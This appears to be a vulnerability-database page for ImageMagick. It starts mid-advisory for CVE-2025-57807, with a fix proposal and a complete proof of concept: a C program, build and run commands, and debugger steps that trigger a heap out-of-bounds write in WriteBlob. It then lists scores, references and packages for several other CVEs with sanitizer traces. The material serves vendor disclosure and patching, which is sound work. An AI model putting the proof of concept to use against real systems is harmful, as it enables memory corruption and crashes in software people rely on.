In [`WriteBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938) (BlobStream case):

1. **Checked requirement:**  
    `need = (size_t)offset + length;` → if `need < (size_t)offset`, overflow → fail.
    
2. **Ensure capacity ≥ need:**  
    `target = MagickMax(extent + quantum + length, need);`  
    (Optionally loop, doubling `quantum`, until `extent ≥ need` to preserve amortization.)
    
3. **Reallocate to `target + 1` before copying;** then perform the move.
    

**Companion hardening (recommended):**

- Document or restrict [`SeekBlob()`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5106-L5134) on BlobStream so forward seeks either trigger explicit growth/zero-fill or require the subsequent write to meet the invariant.
    
- Centralize blob arithmetic in checked helpers.
    
- Unit tests: forward-seek-then-write (success and overflow-reject).
    

---

## Regression & Compatibility

- **Behavior change:** Forward-seeked writes will either allocate to required size or fail cleanly (overflow/alloc-fail).
    
- **Memory profile:** Single writes after very large seeks may allocate large buffers; callers requiring sparse behavior should use file-backed streams.
    

---

## Vendor Verification Checklist

- Reproduce with a minimal in-memory BlobStream harness under ASan.
    
- Apply fix; verify `extent ≥ offset + length` at all write sites.
    
- Add forward-seek test cases (positive/negative).
    
- Audit other growth sites (`SetBlobExtent`, stream helpers).
    
- Clarify BlobStream seek semantics in documentation.
    
- Unit test: forward seek to large offset on **BlobStream** followed by 1–8 byte writes; assert either growth to `need` or clean failure.
    

---

# PoC / Reproduction / Notes

## Environment

- **OS/Arch:** macOS 14 (arm64)
    
- **Compiler:** clang-17 with AddressSanitizer
    
- **ImageMagick:** Q16-HDRI
    
- **Prefix:** `~/opt/im-7.1.2-0`
    
- **`pkg-config`:** from PATH (no hard-coded `/usr/local/...`)
    

---

## Build ImageMagick 7.1.2-0 (static, minimal)

```bash
./configure --prefix="$HOME/opt/im-7.1.2-0" --enable-hdri --with-quantum-depth=16 \
  --disable-shared --enable-static --without-modules \
  --without-magick-plus-plus --disable-openmp --without-perl \
  --without-x --without-lqr --without-gslib

make -j"$(sysctl -n hw.ncpu)"
make install

"$HOME/opt/im-7.1.2-0/bin/magick" -version > magick_version.txt
```

---

## Build & Run the PoC (memory-backed BlobStream)

**`poc.c`:**  
_Uses private headers (`blob-private.h`) to exercise blob internals; a public-API variant (custom streams) is feasible but unnecessary for triage._

```c
// poc.c

#include <stdio.h>

#include <stdlib.h>

#include <MagickCore/MagickCore.h>

#include <MagickCore/blob.h>

#include "MagickCore/blob-private.h"

  

int main(int argc, char **argv) {

MagickCoreGenesis(argv[0], MagickTrue);

ExceptionInfo *e = AcquireExceptionInfo();

ImageInfo *ii = AcquireImageInfo();

Image *im = AcquireImage(ii, e);

if (!im) return 1;

  

// 1-byte memory blob → BlobStream

unsigned char *buf = (unsigned char*) malloc(1);

buf[0] = 0x41;

AttachBlob(im->blob, buf, 1); // type=BlobStream, extent=1, offset=0

SetBlobExempt(im, MagickTrue); // don't free our malloc'd buf

  

// Step 1: write 1 byte (creates BlobInfo + sets offset=1)

unsigned char A = 0x42;

(void) WriteBlob(im, 1, &A);

fprintf(stderr, "[+] after 1 byte: off=%lld len=%zu\n",

(long long) TellBlob(im), (size_t) GetBlobSize(im));

  

// Step 2: seek way past end without growing capacity

const MagickOffsetType big = (MagickOffsetType) 0x10000000; // 256 MiB

(void) SeekBlob(im, big, SEEK_SET);

fprintf(stderr, "[+] after seek: off=%lld len=%zu\n",

(long long) TellBlob(im), (size_t) GetBlobSize(im));

  

// Step 3: small write → reallocation grows by quantum+length, not to offset+length

// memcpy then writes to data + offset (OOB)

const unsigned char payload[] = "PWN";

(void) WriteBlob(im, sizeof(payload), payload);

  

// If we get here, it didn't crash

fprintf(stderr, "[-] no crash; check ASan flags.\n");

  

(void) CloseBlob(im);

DestroyImage(im); DestroyImageInfo(ii); DestroyExceptionInfo(e);

MagickCoreTerminus();

return 0;

}
```

---

`run:`

```bash
# Use the private prefix for pkg-config
export PKG_CONFIG_PATH="$HOME/opt/im-7.1.2-0/lib/pkgconfig:$PKG_CONFIG_PATH"

# Strict ASan for crisp failure
export ASAN_OPTIONS='halt_on_error=1:abort_on_error=1:detect_leaks=0:fast_unwind_on_malloc=0'

# Compile (static link pulls transitive deps via --static)
clang -std=c11 -g -O1 -fno-omit-frame-pointer -fsanitize=address -o poc poc.c \
  $(pkg-config --cflags MagickCore-7.Q16HDRI) \
  $(pkg-config --static --libs MagickCore-7.Q16HDRI)

# Execute and capture
./poc 2>&1 | tee asan.log
```

**Expected markers prior to the fault:**

```
[+] after 1 byte: off=1 len=1
[+] after seek:  off=268435456 len=1
```

An ASan **WRITE** crash in [`WriteBlob`](https://github.com/ImageMagick/ImageMagick/blob/3fcd081c0278427fc0e8ac40ef75c0a1537792f7/MagickCore/blob.c#L5915-L5938) follows (top frames: `WriteBlob blob.c:<line>`, then `_platform_memmove` / `__sanitizer_internal_memmove`).

---

## Debugger Verification (manual)

LLDB can be used to snapshot the invariants; ASan alone is sufficient.

```
lldb ./poc
(lldb) settings set use-color false
(lldb) break set -n WriteBlob
(lldb) run

# First stop (prime write)
(lldb) frame var length
(lldb) frame var image->blob->type image->blob->offset image->blob->length image->blob->extent image->blob->quantum image->blob->mapped
(lldb) continue

# Second stop (post-seek write)
(lldb) frame var length
(lldb) frame var image->blob->type image->blob->offset image->blob->length image->blob->extent image->blob->quantum image->blob->mapped
(lldb) expr -- (unsigned long long)image->blob->offset + (unsigned long long)length
(lldb) expr -- (void*)((unsigned char*)image->blob->data + (size_t)image->blob->offset)

# Into the fault; if inside memmove (no locals):
(lldb) bt
(lldb) frame select 1
(lldb) frame var image->blob->offset image->blob->length image->blob->extent image->blob->quantum
```

**Expected at second stop:**  
`type = BlobStream` · `offset ≈ 0x10000000` (256 MiB) · `length ≈ 3–4` · `extent ≈ 64 KiB` (≪ `offset + length`) · `quantum ≈ 128 KiB` · `mapped = MagickFalse` · `data + offset` far beyond base; next `continue` crashes in `_platform_memmove`.
    
---

## Credits

**Reported by:** Lumina Mescuwa

---
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-57807.json
reference_id
reference_type
scores
0
value 4.2
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-57807.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-57807
reference_id
reference_type
scores
0
value 0.00047
scoring_system epss
scoring_elements 0.14541
published_at 2026-04-21T12:55:00Z
1
value 0.00047
scoring_system epss
scoring_elements 0.14476
published_at 2026-04-18T12:55:00Z
2
value 0.00047
scoring_system epss
scoring_elements 0.14472
published_at 2026-04-16T12:55:00Z
3
value 0.00047
scoring_system epss
scoring_elements 0.1458
published_at 2026-04-13T12:55:00Z
4
value 0.00047
scoring_system epss
scoring_elements 0.14635
published_at 2026-04-12T12:55:00Z
5
value 0.00047
scoring_system epss
scoring_elements 0.14674
published_at 2026-04-11T12:55:00Z
6
value 0.00047
scoring_system epss
scoring_elements 0.14757
published_at 2026-04-04T12:55:00Z
7
value 0.00047
scoring_system epss
scoring_elements 0.14714
published_at 2026-04-09T12:55:00Z
8
value 0.00047
scoring_system epss
scoring_elements 0.14655
published_at 2026-04-08T12:55:00Z
9
value 0.00047
scoring_system epss
scoring_elements 0.14684
published_at 2026-04-02T12:55:00Z
10
value 0.00047
scoring_system epss
scoring_elements 0.14565
published_at 2026-04-07T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-57807
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-57807
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-57807
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 4.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 3.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
5
reference_url https://github.com/ImageMagick/ImageMagick/commit/077a417a19a5ea8c85559b602754a5b928eef23e
reference_id
reference_type
scores
0
value 3.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-08T13:58:41Z/
url https://github.com/ImageMagick/ImageMagick/commit/077a417a19a5ea8c85559b602754a5b928eef23e
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg
reference_id
reference_type
scores
0
value 3.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L
1
value LOW
scoring_system cvssv3.1_qr
scoring_elements
2
value LOW
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-09-08T13:58:41Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-23hg-53q6-hqfg
7
reference_url https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html
reference_id
reference_type
scores
0
value 3.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://lists.debian.org/debian-lts-announce/2025/09/msg00012.html
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-57807
reference_id
reference_type
scores
0
value 3.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:U/C:L/I:L/A:L
1
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-57807
9
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114520
reference_id 1114520
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1114520
10
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2393590
reference_id 2393590
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2393590
11
reference_url https://github.com/advisories/GHSA-23hg-53q6-hqfg
reference_id GHSA-23hg-53q6-hqfg
reference_type
scores
0
value LOW
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-23hg-53q6-hqfg
12
reference_url https://usn.ubuntu.com/7756-1/
reference_id USN-7756-1
reference_type
scores
url https://usn.ubuntu.com/7756-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.8.2
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.8.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-15ny-qqbj-qyfk
1
vulnerability VCID-1cpn-zvem-v7gt
2
vulnerability VCID-29r3-kvf4-n3hc
3
vulnerability VCID-2gw3-qfan-jygd
4
vulnerability VCID-2zje-ag2v-7kac
5
vulnerability VCID-54da-fzyt-4ud2
6
vulnerability VCID-569d-6nue-5kbq
7
vulnerability VCID-5uyd-bv33-h7g1
8
vulnerability VCID-5zkt-kcgx-a3e2
9
vulnerability VCID-62ar-kwbq-nyh3
10
vulnerability VCID-69f6-ceje-hyah
11
vulnerability VCID-6h7x-3rue-kucp
12
vulnerability VCID-6meg-yjby-a7gj
13
vulnerability VCID-6rma-wjdv-uqe9
14
vulnerability VCID-6ztv-auh8-27gx
15
vulnerability VCID-acsa-1uwk-fqee
16
vulnerability VCID-anyp-2jr7-73a1
17
vulnerability VCID-b43n-3d1g-u3fe
18
vulnerability VCID-b5pd-kk97-gban
19
vulnerability VCID-bd1g-sfsp-37h7
20
vulnerability VCID-bw4q-dt1r-y3e4
21
vulnerability VCID-cbqr-aybx-d3e6
22
vulnerability VCID-cuhw-ew1g-s3h2
23
vulnerability VCID-d8yf-8rff-3yhf
24
vulnerability VCID-dabd-m3mf-3ker
25
vulnerability VCID-dtza-65ku-aber
26
vulnerability VCID-emmr-15qp-vfah
27
vulnerability VCID-f1zu-xb4j-8qhp
28
vulnerability VCID-fnck-7mvx-hqc9
29
vulnerability VCID-g41y-dv8u-3yf1
30
vulnerability VCID-gdg8-aejn-83c4
31
vulnerability VCID-h221-qd8d-tqa5
32
vulnerability VCID-jc5m-7rvc-2qg6
33
vulnerability VCID-jcjk-s89c-mbbm
34
vulnerability VCID-jvq6-xjbu-fkb9
35
vulnerability VCID-kdw5-8y5z-zya5
36
vulnerability VCID-kefv-kpkk-wudf
37
vulnerability VCID-mntx-6yku-3qcx
38
vulnerability VCID-n47w-r932-abey
39
vulnerability VCID-p5aw-n691-nkff
40
vulnerability VCID-pcme-bwan-3bcf
41
vulnerability VCID-r3vw-ncns-cqgb
42
vulnerability VCID-rbdg-vz8x-ykah
43
vulnerability VCID-rj9n-ra1t-77dy
44
vulnerability VCID-rjkf-pdny-2fhn
45
vulnerability VCID-sd54-b8z1-2fg7
46
vulnerability VCID-sd7w-6qv5-73ge
47
vulnerability VCID-sdc2-fcap-abaz
48
vulnerability VCID-spch-fffg-4yc5
49
vulnerability VCID-sw7g-hxxr-n3e1
50
vulnerability VCID-tv15-dcnu-pbbn
51
vulnerability VCID-utfe-h3b7-jqcj
52
vulnerability VCID-uvpj-a8v5-ebgz
53
vulnerability VCID-vaks-d4k5-zue7
54
vulnerability VCID-vkp6-wh22-eqap
55
vulnerability VCID-vpdn-g1k9-1kdn
56
vulnerability VCID-x44m-x33k-hydn
57
vulnerability VCID-x8c6-9pse-xkc8
58
vulnerability VCID-xbsu-ac6g-53fn
59
vulnerability VCID-y4hn-6bv6-jugw
60
vulnerability VCID-y58b-be93-hbfd
61
vulnerability VCID-yx7r-r7ez-7uhp
62
vulnerability VCID-z9t9-bxf9-hkfk
63
vulnerability VCID-zab9-9tqj-hbhg
64
vulnerability VCID-zpcy-nms7-kuha
65
vulnerability VCID-zx14-t8et-ufcq
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.8.2
aliases CVE-2025-57807, GHSA-23hg-53q6-hqfg
risk_score 1.9
exploitability 0.5
weighted_severity 3.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-mxg1-261s-nbds
39
url VCID-n47w-r932-abey
vulnerability_id VCID-n47w-r932-abey
summary 
ImageMagick is vulnerable to Heap Overflow when writing extremely large image profile in the PNG encoder
An extremely large image profile could result in a heap overflow when encoding a PNG image.
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30883.json
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-30883.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30883
reference_id
reference_type
scores
0
value 7e-05
scoring_system epss
scoring_elements 0.00676
published_at 2026-04-21T12:55:00Z
1
value 7e-05
scoring_system epss
scoring_elements 0.00447
published_at 2026-04-02T12:55:00Z
2
value 7e-05
scoring_system epss
scoring_elements 0.00446
published_at 2026-04-04T12:55:00Z
3
value 7e-05
scoring_system epss
scoring_elements 0.00439
published_at 2026-04-07T12:55:00Z
4
value 7e-05
scoring_system epss
scoring_elements 0.00435
published_at 2026-04-08T12:55:00Z
5
value 7e-05
scoring_system epss
scoring_elements 0.00437
published_at 2026-04-09T12:55:00Z
6
value 7e-05
scoring_system epss
scoring_elements 0.00642
published_at 2026-04-11T12:55:00Z
7
value 7e-05
scoring_system epss
scoring_elements 0.00637
published_at 2026-04-12T12:55:00Z
8
value 7e-05
scoring_system epss
scoring_elements 0.00638
published_at 2026-04-13T12:55:00Z
9
value 7e-05
scoring_system epss
scoring_elements 0.00631
published_at 2026-04-16T12:55:00Z
10
value 7e-05
scoring_system epss
scoring_elements 0.00636
published_at 2026-04-18T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30883
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-30883
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-30883
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 8.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.4
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qmw5-2p58-xvrc
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-10T14:53:57Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-qmw5-2p58-xvrc
7
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30883
reference_id
reference_type
scores
0
value 5.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:H
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30883
8
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2445878
reference_id 2445878
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2445878
9
reference_url https://github.com/advisories/GHSA-qmw5-2p58-xvrc
reference_id GHSA-qmw5-2p58-xvrc
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qmw5-2p58-xvrc
10
reference_url https://usn.ubuntu.com/8127-1/
reference_id USN-8127-1
reference_type
scores
url https://usn.ubuntu.com/8127-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-jc5m-7rvc-2qg6
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.4
aliases CVE-2026-30883, GHSA-qmw5-2p58-xvrc
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-n47w-r932-abey
40
url VCID-p5aw-n691-nkff
vulnerability_id VCID-p5aw-n691-nkff
summary 
ImageMagick: MSL image stack index may fail to refresh, leading to leaked images
Sometimes msl.c fails to update the stack index, so an image is stored in the wrong slot and never freed on error, causing leaks.

```
==841485==ERROR: LeakSanitizer: detected memory leaks

Direct leak of 13512 byte(s) in 1 object(s) allocated from:
    #0 0x7ff330759887 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25988.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25988.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25988
reference_id
reference_type
scores
0
value 0.00024
scoring_system epss
scoring_elements 0.06594
published_at 2026-04-04T12:55:00Z
1
value 0.00024
scoring_system epss
scoring_elements 0.06663
published_at 2026-04-11T12:55:00Z
2
value 0.00024
scoring_system epss
scoring_elements 0.06671
published_at 2026-04-09T12:55:00Z
3
value 0.00024
scoring_system epss
scoring_elements 0.06628
published_at 2026-04-08T12:55:00Z
4
value 0.00024
scoring_system epss
scoring_elements 0.06558
published_at 2026-04-02T12:55:00Z
5
value 0.00024
scoring_system epss
scoring_elements 0.06578
published_at 2026-04-07T12:55:00Z
6
value 0.00024
scoring_system epss
scoring_elements 0.06726
published_at 2026-04-21T12:55:00Z
7
value 0.00024
scoring_system epss
scoring_elements 0.06568
published_at 2026-04-18T12:55:00Z
8
value 0.00024
scoring_system epss
scoring_elements 0.06577
published_at 2026-04-16T12:55:00Z
9
value 0.00024
scoring_system epss
scoring_elements 0.06647
published_at 2026-04-13T12:55:00Z
10
value 0.00024
scoring_system epss
scoring_elements 0.06656
published_at 2026-04-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25988
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25988
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25988
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
reference_url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/dlemstra/Magick.NET/releases/tag/14.10.3
5
reference_url https://github.com/ImageMagick/ImageMagick
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick
6
reference_url https://github.com/ImageMagick/ImageMagick/commit/4354fc1d554ec2e6314aed13536efa7bde9593d2
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/ImageMagick/ImageMagick/commit/4354fc1d554ec2e6314aed13536efa7bde9593d2
7
reference_url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-782x-jh29-9mf7
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-28T02:08:10Z/
url https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-782x-jh29-9mf7
8
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-25988
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-25988
9
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=2442101
reference_id 2442101
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=2442101
10
reference_url https://github.com/advisories/GHSA-782x-jh29-9mf7
reference_id GHSA-782x-jh29-9mf7
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-782x-jh29-9mf7
11
reference_url https://usn.ubuntu.com/8127-1/
reference_id USN-8127-1
reference_type
scores
url https://usn.ubuntu.com/8127-1/
fixed_packages
0
url pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
purl pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1cpn-zvem-v7gt
1
vulnerability VCID-2zje-ag2v-7kac
2
vulnerability VCID-54da-fzyt-4ud2
3
vulnerability VCID-6h7x-3rue-kucp
4
vulnerability VCID-bw4q-dt1r-y3e4
5
vulnerability VCID-cuhw-ew1g-s3h2
6
vulnerability VCID-dabd-m3mf-3ker
7
vulnerability VCID-g41y-dv8u-3yf1
8
vulnerability VCID-jc5m-7rvc-2qg6
9
vulnerability VCID-n47w-r932-abey
10
vulnerability VCID-r3vw-ncns-cqgb
11
vulnerability VCID-rbdg-vz8x-ykah
12
vulnerability VCID-rj9n-ra1t-77dy
13
vulnerability VCID-rjkf-pdny-2fhn
14
vulnerability VCID-sw7g-hxxr-n3e1
15
vulnerability VCID-x8c6-9pse-xkc8
16
vulnerability VCID-y58b-be93-hbfd
17
vulnerability VCID-zpcy-nms7-kuha
resource_url http://public2.vulnerablecode.io/packages/pkg:nuget/Magick.NET-Q16-HDRI-OpenMP-x64@14.10.3
aliases CVE-2026-25988, GHSA-782x-jh29-9mf7
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-p5aw-n691-nkff
41
url VCID-pcme-bwan-3bcf
vulnerability_id VCID-pcme-bwan-3bcf
summary 
ImageMagick has NULL Pointer Dereference in ClonePixelCacheRepository via crafted image
A NULL pointer dereference in ClonePixelCacheRepository allows a remote attacker to crash any application linked against ImageMagick by supplying a crafted image file, resulting in Denial of Service.

```
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3704942==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x7f9d141239e0 bp 0x7ffd4c5711e0 sp 0x7ffd4c571148 T0)
    #0 0x7f9d141239e0  (/lib/x86_64-linux-gnu/libc.so.6+0xc49e0)
    #1 0x558a25e4f08d in ClonePixelCacheRepository._omp_fn.0 MagickCore/cache.c:784
    #2 0x7f9d14c06a15 in GOMP_parallel (/lib/x86_64-linux-gnu/libgomp.so.1+0x14a15)
    #3 0x558a25e43151 in ClonePixelCacheRepository MagickCore/cache.c:753
    #4 0x558a25e49a96 in OpenPixelCache MagickCore/cache.c:3849
    #5 0x558a25e45117 in GetImagePixelCache MagickCore/cache.c:1829
    #6 0x558a25e4dde3 in SyncImagePixelCache MagickCore/cache.c:5647
    #7 0x558a256ba57d in SetImageExtent MagickCore/image.c:2713
```
references
0
reference_url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25798.json
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-25798.json
1
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-25798
reference_id
reference_type
scores
0
value 0.00063
scoring_system epss
scoring_elements 0.19416
published_at 2026-04-21T12:55:00Z
1
value 0.00063
scoring_system epss
scoring_elements 0.19401
published_at 2026-04-18T12:55:00Z
2
value 0.00063
scoring_system epss
scoring_elements 0.19393
published_at 2026-04-16T12:55:00Z
3
value 0.00063
scoring_system epss
scoring_elements 0.19433
published_at 2026-04-13T12:55:00Z
4
value 0.00063
scoring_system epss
scoring_elements 0.19491
published_at 2026-04-12T12:55:00Z
5
value 0.00063
scoring_system epss
scoring_elements 0.19535
published_at 2026-04-09T12:55:00Z
6
value 0.00063
scoring_system epss
scoring_elements 0.19483
published_at 2026-04-08T12:55:00Z
7
value 0.00063
scoring_system epss
scoring_elements 0.19405
published_at 2026-04-07T12:55:00Z
8
value 0.00063
scoring_system epss
scoring_elements 0.19683
published_at 2026-04-04T12:55:00Z
9
value 0.00063
scoring_system epss
scoring_elements 0.19538
published_at 2026-04-11T12:55:00Z
10
value 0.00152
scoring_system epss
scoring_elements 0.35968
published_at 2026-04-02T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-25798
2
reference_url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25798
reference_id
reference_type
scores
url https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-25798
3
reference_url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
url https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml
4
